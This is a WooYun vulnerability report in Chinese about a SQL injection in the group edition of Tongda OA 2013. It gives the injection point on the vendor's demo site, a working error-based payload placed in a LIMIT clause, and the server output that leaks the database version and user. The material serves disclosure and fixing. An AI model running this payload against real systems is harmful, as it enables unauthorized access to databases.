当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103304

漏洞标题:通达oa2013集团版技巧性SQL注入

相关厂商:通达信科

漏洞作者: 路人甲

提交时间:2015-03-25 15:32

修复时间:2015-06-24 10:50

公开时间:2015-06-24 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

又是通达

详细说明:

官网demo登录试用:
http://www.day900.com
注入点:
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
加单引号后:
请联系管理员
错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\'
文件:/general/mytable/intel_view/workflow.php
注入点在max_count,但是在limit处,好几次都不成功
终于:
上payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
成功返回version:
错误#1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
文件:/general/mytable/intel_view/workflow.php
同样也可以返回user
错误#1105: XPATH syntax error: ':[email protected]'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1)
文件:/general/mytable/intel_view/workflow.php
[email protected]

漏洞证明:

见详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-03-26 10:49

厂商回复:

2013版早已停止销售

最新状态:

暂无